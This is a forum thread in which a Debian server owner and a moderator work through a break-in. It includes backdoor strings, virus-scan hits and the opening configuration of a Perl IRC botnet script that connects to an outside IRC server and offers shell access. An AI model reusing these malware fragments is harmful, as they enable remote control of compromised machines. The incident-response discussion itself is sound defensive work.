LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 02-18-2007, 08:56 PM   #1
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Rep: Reputation: 39
Backdoor.Linux.Small & Linux.Plupii - Debian DSA-789-1


Hi all,

It seems I might of had this exploit on my server. Although, DSA-789-1 is fixed in sarge and php 4.3.10-16 (I have 4.3.10-18).



Here's what I found:

apache wasn't taking incoming connections, so I dug deep

Code:
server:/proc/15812# ps ax | grep apache
15812 ?        Ss     0:00 ./apache
10343 pts/0    S+     0:00 grep apache
Code:
server:/proc/15812# cat environ
PATH=/usr/local/bin:/usr/bin:/bin_=./apachePWD=/tmpLANG=CSHLVL=2
Code:
server:/proc/15812# ll /tmp/ -h
total 143M
-rw-r--r--  1 www-data www-data 1.5K Feb  2 11:34 BlueMarble.kml
-rw-r--r--  1 www-data www-data 143M Feb  6 21:42 WYD747.exe 
-rwxrwxrwx  1 www-data www-data  19K May 13  2006 apache
drwx------  2 david    david    4.0K Jan 22 14:24 vmware-david
Code:
server:/proc/15812# md5sum /tmp/apache
cd10c520f924110d311b202a9f715b03  /tmp/apache 

server:/proc/15812# md5sum  /usr/sbin/apache2ctl
0bae0b8f1088d3641659e4e8d9ef32b2  /usr/sbin/apache2ctl 

server:/proc/15812# md5sum  /usr/sbin/apache2
cc8722680ff76f17b0f2bf3fc3c5bc76  /usr/sbin/apache2
Code:
server:/proc/15812# ll -h  /usr/sbin/apache2 
-rwxr-xr-x  1 root root 376K Jul 28  2006 /usr/sbin/apache2 

server:/proc/15812# ll -h  /usr/sbin/apache2ctl 
-rwxr-xr-x  1 root root 3.1K Jul 28  2006 /usr/sbin/apache2ctl 

server:/proc/15812# ll -h  /tmp/apache 
-rwxrwxrwx  1 www-data www-data 19K May 13  2006 /tmp/apache
Found this little bit in the binary /tmp/apache

Code:
bcde0123456789abcdef/dev/ptmx/dev/pty/dev/ttysocketbindlisten
 Innocent Boys backdoor =]
 Binding the %d
OK, pid = %d
//dev/nullsh-i/tmpHOME=/tmpCan't fork pty, bye!
/bin/sd
Code:
tcp        0      0 0.0.0.0:9865            0.0.0.0:*               LISTEN     15812/apache
tcp6       0      0 :::80                   :::*                    LISTEN     15812/apache
Can't telnet in from external on port 9865 because its behind a router.

I can put up the the binary that was used, if anyone wants to look at it.

I am thinking it might be a variant on the known exploit. Maybe I need to report to Debian bugs ?

Thanks for any tips or information.
 
Old 02-18-2007, 09:21 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
Backdoor running as system user, usually due to lax security settings or running bad PHP applications.


Can't telnet in from external on port 9865 because its behind a router.
Nor would you want to. It's uninteresting: take your loss and move on.
Mitigate (pull the plug), verify (start here: Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...hecklist.html), backup (start here: Steps for Recovering from a UNIX or NT System Compromise (CERT): http://www.cert.org/tech_tips/root_compromise.html), investigate, rebuild from scratch (LQ FAQ: Security references: http://www.linuxquestions.org/questi...threadid=45261)


It seems I might of had this exploit on my server.
Check your logs for clues.


I can put up the the binary that was used, if anyone wants to look at it.
I'm interested, as always.
 
Old 02-18-2007, 09:48 PM   #3
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Thanks I will follow that. I meant to mention that I ran tripwire and it found nothing changed. I have also ran bastille when I set the server up to harden it. Also have rkhunter and chkrootkit running on cron jobs.


How did this exploit get onto my system ? I haven't any xmlrpc.php like files on the system. I have changed www-data's shell from /bin/sh /bin/false. would that help prevention ?


[REMOVED]

Last edited by unSpawn; 09-07-2009 at 05:42 AM. Reason: //tarball removed
 
Old 02-19-2007, 05:23 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
I meant to mention that I ran tripwire and it found nothing changed.
When was that database last generated? What toplevel directories does it cover?


I have also ran bastille when I set the server up to harden it.
Bastille-Linux is a hardening tool that allows you to opt out for applying some measures, right?
So running that doesn't necessarily mean you set everything, and everything as strict as possible, right?


Also have rkhunter and chkrootkit running on cron jobs.
What versions do you run? With respect to Rootkit Hunter (abbev.: RKH), what tests did you disable? RKH-1.2.9 nor CRT-0.47a cover stuff dumped in say /tmp right now but RKH will cover a lot more in the upcoming release though, including an option to scan arbitrary directories for signs of malware (and I should know ;-p).


I have changed www-data's shell from /bin/sh /bin/false.
Shouldn't that have been an inert shell in the first place?


would that help prevention ?
It won't if PHP-based apps still allow one to perform system commands.


How did this exploit get onto my system ? I haven't any xmlrpc.php like files on the system.
Don't concentrate on one thing. The most important thing now is to mitigate the risk and "restore" (not "system restore" as in place back a backup) the situation back to normal. Here's your projected route in a slightly more elaborate way:

1. Read the Intruder Detection Checklist so you know what to do,
2. Notify anyone who has access to the system it's been compromised and to stay off it,
3. Save open files, process and network data listings first then regain full control over the situation by minimally shutting down all non-essential services and raising the firewall. If there are doubts about the effectiveness of this (vs the severity of the breach) power down the box and only boot with a Live CD,
4. After stabilising prepare /etc/and /var backups and make backups for reference (not reuse) (see the "Steps for Recovering..." doc),
5. Investigate (if necessary). Use the steps from the Intruder Detection Checklist. Inspect and report back looking minimally at these (if available):
- (changes in or logged reports about) system authentication data,
- IDS (Snort, Prelude, router logs, filesystem integrity checkers, package manager if good enough),
- all system, daemon and firewall logs,
- installed SW (and was all SW updated?),
- running services,
- unusual (setuid root) files,
- user shell histories.
When you report back separate posting exact and factual information from hints, hunches and gut feelings. What you report back will be seen as "evidence" to help your reach a "verdict" which should justify taking the next steps:
6. repartition, reformat, re-install from scratch,
7. harden (LQ FAQ: Security references).

HTH
 
Old 02-19-2007, 06:21 AM   #5
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Quote:
Originally Posted by unSpawn
I meant to mention that I ran tripwire and it found nothing changed.
When was that database last generated? What toplevel directories does it cover?
I stuck with the Debian default. I can post the config here if you like. I kept the database on an encfs so one has to have a password to mount it and use it. It only ever mounted and umounted manually by me and never left mounted.

Quote:
Originally Posted by unSpawn
I have also ran bastille when I set the server up to harden it.
Bastille-Linux is a hardening tool that allows you to opt out for applying some measures, right?
So running that doesn't necessarily mean you set everything, and everything as strict as possible, right?
I pretty much turned it all one. There was one thing I remember not agreeing with for some reason, but basically I cant do much as a normal user. Its been annoying but needed so it hasn't bothered me.

Quote:
Originally Posted by unSpawn
Also have rkhunter and chkrootkit running on cron jobs.
What versions do you run? With respect to Rootkit Hunter (abbev.: RKH), what tests did you disable? RKH-1.2.9 nor CRT-0.47a cover stuff dumped in say /tmp right now but RKH will cover a lot more in the upcoming release though, including an option to scan arbitrary directories for signs of malware (and I should know ;-p).
server:/etc/tripwire# rkhunter --version
Rootkit Hunter 1.2.9
server:/etc/tripwire# chkrootkit -V
chkrootkit version 0.44

I don't recall disabling any tests.


Quote:
Originally Posted by unSpawn
I have changed www-data's shell from /bin/sh /bin/false.
Shouldn't that have been an inert shell in the first place?
inert? What do you mean ?
I would of thought Debian stable would of not given system users a shell that didn't need it.

Quote:
Originally Posted by unSpawn
would that help prevention ?
It won't if PHP-based apps still allow one to perform system commands.
I removed horde that I wasn't using and 2 other php wiki's that weren't being used at the moment. I also updated the one wiki I am using, PM wiki.

No mention of a security update in the change log though.

Quote:
Originally Posted by unSpawn
How did this exploit get onto my system ? I haven't any xmlrpc.php like files on the system.
Don't concentrate on one thing. The most important thing now is to mitigate the risk and "restore" (not "system restore" as in place back a backup) the situation back to normal. Here's your projected route in a slightly more elaborate way:

1. Read the Intruder Detection Checklist so you know what to do,
2. Notify anyone who has access to the system it's been compromised and to stay off it,
3. Save open files, process and network data listings first then regain full control over the situation by minimally shutting down all non-essential services and raising the firewall. If there are doubts about the effectiveness of this (vs the severity of the breach) power down the box and only boot with a Live CD,
4. After stabilising prepare /etc/and /var backups and make backups for reference (not reuse) (see the "Steps for Recovering..." doc),
5. Investigate (if necessary). Use the steps from the Intruder Detection Checklist. Inspect and report back looking minimally at these (if available):
- (changes in or logged reports about) system authentication data,
- IDS (Snort, Prelude, router logs, filesystem integrity checkers, package manager if good enough),
- all system, daemon and firewall logs,
- installed SW (and was all SW updated?),
- running services,
- unusual (setuid root) files,
- user shell histories.
When you report back separate posting exact and factual information from hints, hunches and gut feelings. What you report back will be seen as "evidence" to help your reach a "verdict" which should justify taking the next steps:
6. repartition, reformat, re-install from scratch,
7. harden (LQ FAQ: Security references).

HTH
Wow that will keep me busy for weeks to come!!




Here's what I found going through log tonight.


server:/log/apache# tail -n 1* error.log.1
[Sun Feb 18 06:27:55 2007] [notice] caught SIGTERM, shutting down

server:/log/apache# tail access.log.1 -n 1
65.55.208.62 - - [18/Feb/2007:05:55:34 +1100] "GET /software/ HTTP/1.0" 200 1485 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"

server:/log/apache# head access.log -n 1
10.1.1.115 - - [18/Feb/2007:15:32:15 +1100] "GET /me HTTP/1.1" 404 358 "-" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux; x86_64) KHTML/3.5.5 (like Gecko) (Kubuntu)"

Down for 10 hours it seems. The SIGTERM command that it was issued is a concerned. I cant see any logs on who or how it was issued.

Other then that, nothing so far. I did a grep for apache in /var/log and nothing suspect came up.
I'll keep digging.
 
Old 02-19-2007, 07:11 AM   #6
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Would this be relevant ? A little before the SIGTERM was sent to apache

Code:
Feb 18 04:47:17 server sshd[24320]: Bad protocol version identification '\200\214\001\003\001' from ::ffff:72.30.177.96
Feb 18 04:47:23 server sshd[24322]: Bad protocol version identification '\200\214\001\003\001' from ::ffff:74.6.65.240
In loginlog.0

It just looks like a ssh login attempt using ipv6, no ?
 
Old 02-19-2007, 07:19 AM   #7
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Code:
Feb 18 06:25:02 server su[1665]: + ??? root:nobody
Feb 18 06:25:02 server su[1665]: (pam_unix) session opened for user nobody by (uid=0)
In auth.log.0

It also appears that syslog is stopped and and restarted by the system (to rotate logs I am assuming) at 6:25am and generally started again by 6:28. So this SIGTERM at 6:27:55 would of been missed by syslogd I think.
 
Old 02-19-2007, 02:16 PM   #8
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
I'll react to your replies later on, but meanwhile I'd like to remark that it's best to first gather all data necessary and only *then* concentrate on details. The first, crucial and guiding question should be: "did they get root account access" because that justifies later actions to take. Then the second question should be: "what attack vector was used" because it shows what measures should be taken in the hardening phase. Wrt to posting information this means investigating changes in the filesystem, auth data and such should go first and httpd logs and such later on.

Last edited by unSpawn; 02-19-2007 at 02:24 PM.
 
Old 02-19-2007, 03:32 PM   #9
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Does this look normal ?

Code:
server:/log# find / -user root -perm -4000 -print
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/gpg
/usr/bin/mtr
/usr/bin/procmail
/usr/bin/sudo
/usr/bin/smbumount
/usr/bin/smbmnt
/usr/bin/lpr
/usr/bin/fusermount
/usr/bin/vmware-ping
/usr/lib/pt_chown
/usr/lib/ssh-keysign
/usr/lib/apache2/suexec2
/usr/lib/vmware/bin/vmware-vmx
/usr/lib/vmware/bin-debug/vmware-vmx
/usr/sbin/vmware-authd
/usr/X11R6/bin/X
/bin/login
/bin/su
find: /proc/5086/task/5086/fd/4: No such file or directory
/sbin/unix_chkpwd
Code:
find / -group kmem -perm -2000 -print
The above finds nothing.
 
Old 02-19-2007, 03:35 PM   #10
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Quote:
Originally Posted by unSpawn
The first, crucial and guiding question should be: "did they get root account access" because that justifies later actions to take.

Yeah thats exactly what I want to know.

So far I'd say no,apart from getting apache to shut down, thats the only alarming thing so far.

I am just about through the checklist; will hopefully finish that today.
 
Old 02-19-2007, 08:14 PM   #11
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
I am just about through the checklist; will hopefully finish that today.
OK, I'll wait for that then.
 
Old 02-20-2007, 12:28 AM   #12
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Hectic day at work unfortunately, so haven't finished the checklist. (I think only a point to go though).

I did, however installed and ran tiger. What an awesome tool!! I love it already. Nothing too bad from the report, but I will post it when I get home tonight. I also stumbled across this:

Quote:
If you wish to gather more information, the tct (The Coroner's Toolkit from Dan Farmer and Wietse Venema) package contains utilities which perform a 'post mortum' of a system. tct allows the user to collect information about deleted files, running processes and more.

To be continued......
 
Old 02-22-2007, 02:53 AM   #13
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
So I finally got a chance to finish the checklist. Nothing else came up apart from what I have posted and ....

Running:

Code:
find / -name ".*" -print -xdev | cat -v
Returns alot of kernel source code.

It did finish with these entries

Code:
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.X64-lock
/tmp/.font-unix
So I went into tmp to have a look and found this odd listing

Code:
server:/tmp# ll -a
total 96
drwxrwxrwt   6 root     root      4096 Feb 22 18:30 .
drwxr-xr-x  23 root     root      4096 Jan 19 12:39 ..
drwxrwxrwt   2 root     root      4096 Jan 22 01:35 .ICE-unix
drwxrwxrwt   2 root     root      4096 Jan 22 01:36 .X11-unix
-r--r--r--   1 root     root        11 Jan 22 01:36 .X64-lock
drwxrwxrwt   2 root     root      4096 Jan 22 01:36 .font-unix
-rwxr-xr-x   1 root     root     23538 Feb 22 18:20 a.out
-rw-r--r--   1 www-data www-data 19890 Feb 21 12:41 botnet.txt
-rwxrwxrwx   1 www-data www-data 23570 Feb 16 05:49 r0nin
drwx------   2 david    david     4096 Jan 22 14:24 vmware-david
so...

Code:
server:/tmp# file r0nin 
r0nin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.0, dynamically linked (uses shared libs), not stripped
server:/tmp# ll /tmp/r0nin 
-rwxrwxrwx  1 www-data www-data 23570 Feb 16 05:49 /tmp/r0nin
and..

Code:
server:/tmp# clamscan r0nin
r0nin: Linux.RST.B FOUND

----------- SCAN SUMMARY -----------
Known viruses: 90297
Engine version: 0.84
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Time: 6.854 sec (0 m 6 s)
and

Code:
server:/tmp# ll a.out 
-rwxr-xr-x  1 root root 23538 Feb 22 18:20 a.out

server:/tmp# clamscan a.out 
a.out: Linux.RST.B FOUND

----------- SCAN SUMMARY -----------
Known viruses: 90297
Engine version: 0.84
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Time: 6.778 sec (0 m 6 s)
Also checked out this "text" file that looks more like.

Code:
server:/tmp# ll botnet.txt 
-rw-r--r--  1 www-data www-data 19890 Feb 21 12:41 botnet.txt
server:/tmp# clamscan botnet.txt 
botnet.txt: OK

----------- SCAN SUMMARY -----------
Known viruses: 90297
Engine version: 0.84
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.02 MB
Time: 6.997 sec (0 m 6 s)
But copying it to here at work, Symantec AV picked it up straight away as
Quote:
IRC.Backdoor.Trojan
and deleted it.


Code:
server:/tmp# head -n 30 botnet.txt 
################ CONFIGURACAO #################################################################
my $processo = '/usr/locall/apache/bin/httpd -DSSL';                   # Nome do processo que vai aparece no ps       #
#----------------------------------------------################################################
my $linas_max='8';                             # Evita o flood :) depois de X linhas         #
#----------------------------------------------################################################
my $sleep='4';                                 # ele dorme X segundos                         #
##################### IRC #####################################################################
my @adms=("Br4Nco","owned");                   # Nick do administrador                        #
#----------------------------------------------################################################
my @canais=("#packets");                           # Caso haja senha ("#canal :senha")            #
#----------------------------------------------################################################
my $nick='net';                    # Nick do bot. Caso esteja em uso vai aparecer #
                                               # aparecer com numero radonamico no final      #
#----------------------------------------------################################################
my $ircname = 'id';                          # User ID                                      #
#----------------------------------------------################################################
chop (my $realname = `uname -r`);              # Full Name                                    #
#----------------------------------------------################################################
$servidor='irc.quakenet.org' unless $servidor;    # Servidor de irc que vai ser usado            #
                                               # caso n?o seja especificado no argumento      #
#----------------------------------------------################################################
my $porta='6669';                              # Porta do servidor de irc                     #
################ ACESSO A SHELL ###############################################################
my $secv = 1;                                  # 1/0 pra habilita/desabilita acesso a shell   #
###############################################################################################

my $VERSAO = '0.2';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';


And look what else I stumbled across...

Code:
server:/tmp# ll /root/a.out 
-rwxr-xr-x  1 root root 19421 Feb 21 14:12 /root/a.out

server:/tmp# clamscan /root/a.out 
/root/a.out: Trojan.Linux.Small.I FOUND

----------- SCAN SUMMARY -----------
Known viruses: 90297
Engine version: 0.84
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.02 MB
Time: 7.990 sec (0 m 7 s)


Looks like my server is becoming more of a honeypot Dear lord!!


I am going to run clamscan on the entire system and see what else pops up.

Obviously, this system needs to be wiped out, but what can I do right now to make the most of it and find out how this happened ?

I have run tiger and will post the output on the next post.

Should I run snort on this ? I have been wanting to install it, but haven't even had a chance to start a tutorial. I did read someone say just apt-get it, follow the prompts and watch it log. Is it that simple ?
 
Old 02-22-2007, 02:56 AM   #14
DaveQB
Member
 
Registered: Oct 2003
Location: Sydney, Australia.
Distribution: Debian, Ubuntu
Posts: 400

Original Poster
Rep: Reputation: 39
Tiger report


Code:
Security scripts *** 3.2.1, 2003.10.10.18.00 ***
Tue Feb 20 15:45:55 EST 2007
15:45> Beginning security report for server (GNU/Linux Linux 2.6.8-3-686).

# Performing check of passwd files...
# Checking entries from /etc/passwd.
--WARN-- [pass014w] Login (backup) is disabled, but has a valid shell. 
--WARN-- [pass016w] User distccd has / as home directory 
--WARN-- [pass015w] Login ID info does not have a valid shell (/bin/none). 
--WARN-- [pass015w] Login ID intricateone does not have a valid shell 
         (/bin/none). 
--WARN-- [pass015w] Login ID lee44 does not have a valid shell (/bin/none). 
--WARN-- [pass014w] Login (list) is disabled, but has a valid shell. 
--WARN-- [pass015w] Login ID nath18 does not have a valid shell (/bin/none). 
--WARN-- [pass015w] Login ID rick51 does not have a valid shell (/bin/none). 
--WARN-- [pass015w] Login ID tak does not have a valid shell (/bin/none). 
--WARN-- [pass015w] Login ID tut96 does not have a valid shell (/bin/none). 
--WARN-- [pass015w] Login ID walton60 does not have a valid shell (/bin/none). 
--WARN-- [pass001w] Username `anniversary' exists multiple times (2) in 
         /etc/passwd. 
--WARN-- [pass002w] UID 741 exists multiple times (2) in /etc/passwd. 
--WARN-- [pass012w] Home directory /home/anniversary exists multiple times (2) 
         in /etc/passwd. 
--WARN-- [pass006w] Integrity of password files questionable (/usr/sbin/pwck 
         -r). 

# Performing check of group files...

# Performing check of user accounts...
# Checking accounts from /etc/passwd.
--WARN-- [acc019w] Login ID ben may be missing a shell initialization file 
         /home/ben/.bashrc. 
--WARN-- [acc008w] Login ID coach's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID coach's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc008w] Login ID david's .bashrc config file has group `501' write 
         access. 
--WARN-- [acc008w] Login ID david's .bash_profile config file has group `501' 
         write access. 
--WARN-- [acc008w] Login ID dennis's .bashrc config file has group `500' write 
         access. 
--WARN-- [acc008w] Login ID dennis's .bash_profile config file has group `500' 
         write access. 
--WARN-- [acc008w] Login ID info's .bashrc config file has group `users' write 
         access. 
--WARN-- [acc008w] Login ID info's .bash_profile config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID intricateone's .bashrc config file has group 
         `users' write access. 
--WARN-- [acc008w] Login ID intricateone's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc008w] Login ID jj's .bashrc config file has group `502' write 
         access. 
--WARN-- [acc008w] Login ID jj's .bash_profile config file has group `502' 
         write access. 
--WARN-- [acc008w] Login ID lee44's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID lee44's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc008w] Login ID nath18's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID nath18's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc006w] Login ID neill's home directory (/home/neill) has group 
         `users' write access. 
--WARN-- [acc021w] Login ID neill appears to be a dormant account. 
--WARN-- [acc008w] Login ID neill's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID neill's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc022w] Login ID nobody home directory (/nonexistent) is not 
         accessible. 
--WARN-- [acc008w] Login ID rick51's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID rick51's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc019w] Login ID rwebster may be missing a shell initialization 
         file /home/rwebster/.bashrc. 
--WARN-- [acc008w] Login ID sam's .bashrc config file has group `users' write 
         access. 
--WARN-- [acc008w] Login ID sam's .bash_profile config file has group `users' 
         write access. 
--WARN-- [acc021w] Login ID sshd appears to be a dormant account. 
--WARN-- [acc008w] Login ID tak's .bashrc config file has group `users' write 
         access. 
--WARN-- [acc008w] Login ID tak's .bash_profile config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID tut96's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID tut96's .bash_profile config file has group 
         `users' write access. 
--WARN-- [acc008w] Login ID walton60's .bashrc config file has group `users' 
         write access. 
--WARN-- [acc008w] Login ID walton60's .bash_profile config file has group 
         `users' write access. 

# Performing check of /etc/hosts.equiv and .rhosts files...

# Checking accounts from /etc/passwd...

# Performing check of .netrc files...

# Checking accounts from /etc/passwd...

# Performing common access checks for root (in /etc/default/login, /securetty, and /etc/ttytab...

# Performing check of PATH components...
--WARN-- [path009w] /etc/csh.login does not setenv an initial setting for 
         PATH. 
# Only checking user 'root'

# Performing check of anonymous FTP...

# Performing checks of mail aliases...
# Checking aliases from /etc/aliases.

# Performing check of `cron' entries...
--WARN-- CRON file `/var/spool/cron/crontabs/david' is owned by david.
--WARN-- [cron001w] cron entry for david does not use full pathname (): 
--WARN-- [cron003] cron entry for david uses `/home/david/bin/backup-keep' 
         which contains `/home/david/bin' which is group `501' writable. 
         /home/david/bin/backup-keep 

--WARN-- [cron004w] Root crontab does not exist 
--WARN-- [cron006w] 
         User root is allowed cron usage. 
--WARN-- [cron006w] 
         User david is allowed cron usage. 

# Performing check of 'inetd'...
# Checking inetd entries from /etc/inetd.conf
--WARN-- [inet099w] '902' is not protected by tcp wrappers. 

# Performing check of services with tcp wrappers...
# Analysing inetd entries from /etc/inetd.conf

# Performing check of 'services' ...
# Checking services from /etc/services.
--WARN-- [inet003w] The port for service postgres is also assigned to service 
         postgresql. 
--WARN-- [inet003w] The port for service postgres is also assigned to service 
         postgresql. 
--WARN-- [inet003w] The port for service sane is also assigned to service 
         sane-port. 

# Performing NFS exports check...

# Performing check of system file permissions...

# Performing signature check of system binaries...
--WARN-- [sig004w] None of the following versions of /bin/bash (-rwxr-xr-x) 
         matched the /bin/bash on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/login (-rwsr-xr-x) 
         matched the /bin/login on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/ls (-rwxr-xr-x) 
         matched the /bin/ls on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/mount (-rwxr-xr-x) 
         matched the /bin/mount on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/netstat (-rwxr-xr-x) 
         matched the /bin/netstat on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/ping (-rwxr-xr-x) 
         matched the /bin/ping on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/ps (-rwxr-xr-x) 
         matched the /bin/ps on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/su (-rwsr-xr-x) 
         matched the /bin/su on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/tcsh (-rwxr-xr-x) 
         matched the /bin/tcsh on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /bin/umount (-rwxr-xr-x) 
         matched the /bin/umount on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /sbin/portmap 
         (-rwxr-x---) matched the /sbin/portmap on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/at (-rwxr-xr-x) 
         matched the /usr/bin/at on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/chage 
         (-rwxr-sr-x) matched the /usr/bin/chage on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/chfn 
         (-rwsr-xr-x) matched the /usr/bin/chfn on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/chsh 
         (-rwsr-xr-x) matched the /usr/bin/chsh on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/crontab 
         (-rwxr-sr-x) matched the /usr/bin/crontab on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/gpasswd 
         (-rwsr-x---) matched the /usr/bin/gpasswd on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/lockfile 
         (-rwxr-sr-x) matched the /usr/bin/lockfile on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/lpq (-rwxr-xr-x) 
         matched the /usr/bin/lpq on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/lpr (-rwsr-xr-x) 
         matched the /usr/bin/lpr on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/lprm 
         (-rwxr-xr-x) matched the /usr/bin/lprm on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/mutt 
         (-rwxr-xr-x) matched the /usr/bin/mutt on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/newgrp 
         (-rwsr-xr-x) matched the /usr/bin/newgrp on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/passwd 
         (-rwsr-xr-x) matched the /usr/bin/passwd on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/procmail 
         (-rwsr-sr-x) matched the /usr/bin/procmail on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/screen 
         (-rwxr-sr-x) matched the /usr/bin/screen on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/ssh (-rwxr-xr-x) 
         matched the /usr/bin/ssh on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/traceroute 
         (lrwxrwxrwx) matched the /usr/bin/traceroute on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/wall 
         (-rwxr-sr-x) matched the /usr/bin/wall on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/bin/write 
         (lrwxrwxrwx) matched the /usr/bin/write on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/sbin/inetd 
         (-rwxr-x---) matched the /usr/sbin/inetd on this machine. 
         >>>>>> Linux 2.4.17 
         
--WARN-- [sig004w] None of the following versions of /usr/sbin/lpc 
         (-rwxr-s---) matched the /usr/sbin/lpc on this machine. 
         >>>>>> Linux 2.4.17 
         
